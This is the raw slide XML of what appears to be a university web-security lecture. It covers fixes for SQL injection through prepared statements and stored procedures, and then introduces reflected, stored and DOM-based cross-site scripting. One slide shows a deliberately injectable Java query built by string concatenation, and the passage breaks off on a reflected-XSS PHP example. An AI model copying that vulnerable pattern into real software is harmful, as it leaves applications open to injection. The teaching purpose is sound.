                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>* from `users` where `username` = :name and `password` = SHA1( CONCAT(:pass, `salt`)) limit 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8064A2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitize inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356350"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Doupé - 4/23/12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112586856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93922" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SQL Injection Solutions:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593923" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>String query = “SELECT title, description from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> WHERE id= “+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“id”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Statement stat = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>dbConnection.createStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>stat.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The first step to secure the code is to take the SQL statements out of the web application and into DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>CREATE PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getPressRelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> @id integer AS SELECT title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> WHERE Id = @id</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2370647027"/>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939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9392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9392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9392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9392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9392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95970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SQL Injection Solutions:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Now, in the application, instead of string-building SQL, call stored procedure. For examples, in Java:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>CallableStatements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>dbConnection.prepareCall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“{call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getPressRelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(?)}”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs.setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(1,Integer.parseInt(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“id”)));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2529943410"/>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959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9597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9597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9597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98018" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL Injection Solutions:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Prepared Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>my_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>my_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>", ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> =  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;prepare("SELECT District FROM City WHERE Name=?"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("s", $city); /* type can be “s” = string, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>” = integer … */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;execute(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>($district); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;fetch();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("%s is in district %s\n", $city, $district); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;close();}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8937441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980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9801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9801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9801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9801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9801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98019">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98019">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9801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9170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS attacks are used to bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>JavaScript's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>rigin Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reflected attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Stored attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DOM-based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The JavaScript code on the page takes a string and turns it into code, usually by calling a method such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, Function, or others</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190147544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591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5917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5917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5917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5917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59171">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5917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Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$name = $_GET['name']; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8064A2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
